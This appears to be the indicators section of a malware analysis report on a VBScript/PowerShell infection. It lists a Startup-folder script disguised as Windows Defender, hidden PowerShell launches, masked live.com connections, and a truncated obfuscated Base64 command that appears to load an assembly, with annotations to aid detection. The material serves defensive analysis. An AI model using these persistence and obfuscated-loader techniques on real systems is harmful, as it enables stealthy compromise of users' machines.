Technical Information
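- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs (per-user Startup folder, so the script is run at each logon of that user; the file name imitates Windows Defender)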
- %APPDATA%\empty.vbs
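- 'on####ve.live.com':443
- 'lo###.live.com':443
  (the hostnames appear partly masked with '#'; live.com is a Microsoft domain, so these connections are a weak indicator on their own and are best correlated with the wscript.exe / powershell.exe launches listed below)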
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Empty.Vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:AppData\Empty.Vbs) (with hidden window)
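- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA... (with hidden window)
  (-en abbreviates -EncodedCommand: Base64 over UTF-16LE text. The visible part of the truncated argument decodes to [AppDomain]::('?urrent@omain'.replace('?','C').replace('@','D')).Loa…, i.e. the property name CurrentDomain is assembled by string replacement; what follows is cut off, presumably an assembly Load call. PowerShell script block logging, event ID 4104, records the decoded text.)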
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:AppData\Empty.Vbs)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...